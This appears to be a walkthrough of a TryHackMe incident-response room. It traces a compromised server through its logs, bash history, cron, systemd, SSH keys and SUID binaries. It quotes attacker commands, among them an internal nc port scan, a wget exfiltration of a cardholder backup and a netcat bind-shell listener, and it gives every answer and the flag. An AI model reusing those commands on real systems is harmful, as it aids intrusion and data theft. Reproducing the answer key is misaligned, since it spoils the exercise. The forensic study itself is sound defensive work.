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TryHackMe API Wizard Breach Walkthrough

Task 1: Preparation

Step 1.1 SSH into the Machine

SSH into the box with the credentials provided.

ssh <username>@<IP_address>
# Replace <username> and <IP_address> with the values given

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Task 2: Initial Access

Question 1: Which programming language is the web application written in?

Navigate through the directories to find the application’s code.

cd /home/support/api_service
ls -la

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Answer: Python

Question 2: What is the IP address that attacked the web server?

The web server uses NGINX, so we can check its logs for suspicious activity.

cd /var/log/nginx
tail -n 10 access.log.1

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Look for commands like whoami, pwd, or id, which indicate enumeration attempts by an attacker.

Answer: 149.34.244.142

Question 3: Which vulnerability was found and exploited in the API service?

Inspect the api.py source code for vulnerabilities, particularly around command handling.

cat /home/support/api_service/api.py

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Answer: OS command injection

Question 4: Which file contained the credentials used to privilege escalate to root?

Examine the configuration file for any stored credentials.

cat /home/dev/apiservice/src/config.py

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Answer: /home/dev/apiservice/src/config.py

Question 5: What file did the hacker drop and execute to persist on the server?

Check the bash history to uncover any evidence of files dropped.

sudo su
cat /root/.bash_history

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Answer: /tmp/rooter2

Question 6: Which service was used to host the “rooter2” malware?

In .bash_history, look for commands involving file uploads or downloads.

Answer: transfer.sh


Task 3: Further Actions

Question 7: Which two system files were infected to achieve cron persistence?

Check crontab and environment files for unauthorized entries.

cat /etc/crontab
cat /etc/environment

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Answer: /etc/crontab, /etc/environment

Question 8: What is the C2 server IP address of the malicious actor?

Locate the IP address associated with the SYSTEMUPDATE variable in /etc/environment or other files identified in bash history.

Answer: 5.230.66.147

Question 9: What port is the backdoored bind bash shell listening on?

Use ps to check running processes for a netcat listener.

ps -aux | grep nc

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Answer: 3578

Question 10: How does the bind shell persist across reboots?

Locate the systemd service created by the attacker.

grep -R "nc -l" /

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Answer: systemd service

Question 11: What is the absolute path of the malicious service?

Find the absolute path from the output of the grep command above.

Answer: /etc/systemd/system/socket.service


Task 4: Even More Persistence

Question 12: Which port is blocked on the victim’s firewall?

Use iptables to examine the firewall configuration.

iptables -L

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Answer: 3578

Question 13: How do the firewall rules persist across reboots?

Check the root user's bash configuration files for persistence mechanisms.

cat /root/.bashrc

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Answer: /root/.bashrc

Question 14: How is the backdoored local Linux user named?

Inspect the /etc/passwd file for unusual user entries.

grep "/bin/bash" /etc/passwd

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Answer: support

Question 15: Which privileged group was assigned to the user?

Use the groups command to list group memberships for the user.

groups support

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Answer: sudo

Question 16: What is the strange word on one of the backdoored SSH keys?

View the authorized_keys file in the root user’s SSH directory.

cat /root/.ssh/authorized_keys

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Answer: ntsvc

Question 17: Can you spot and name one more popular persistence method? Not a MITRE technique name.

Check for files with the SUID bit set.

find / -perm -u=s -type f 2>/dev/null

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Answer: SUID binary

Question 18: What are the original and the backdoored binaries from question 6?

Verify the integrity of the suspected binary.

ls -l /usr/bin/clamav
dpkg --verify clamav

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Answer: /usr/bin/bash, /usr/bin/clamav

Question 19: What technique was used to hide the backdoor creation date?

Identify timestamp modification.

Answer: Timestomping


Task 5: Final Target

Question 20: What file was dropped which contained gathered victim information?

Check root’s .bash_history for evidence of dropped files.

cat /root/.bash_history

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Answer: /root/.dump.json

Question 21: According to the dropped dump, what is the server’s kernel version?

Decode and inspect .dump.json for details.

cat /root/.dump.json | base64 -d

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Answer: 5.15.0–78-generic

Question 22: Which active internal IPs were found by the “rooter2” network scan?

Identify internal IPs from the dump.

Answer: 192.168.0.21,192.168.0.22

Question 23: How did the hacker find an exposed HTTP index on another internal IP?

Check the history for a network scan command.

grep -i "nc -zv" /root/.bash_history

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Answer: nc -zv 192.168.0.22 1024-10000 2>&1 | grep -v failed

Question 24: What command was used to exfiltrate the CDE database from the internal IP?

Locate the wget command in the history.

grep "wget" /root/.bash_history

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Answer: wget 192.168.0.22:8080/cde-backup.csv

Question 25: What is the most secret and precious string stored in the exfiltrated database?

Inspect the contents of the exfiltrated .review.csv file.

cat .review.csv | head -n 10

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Answer: pwned{v3ry-secur3-cardh0ld3r-data-environm3nt}

Another skill acquired, another challenge conquered in the Rubixverse. Keep hacking the limits... until the next hack.

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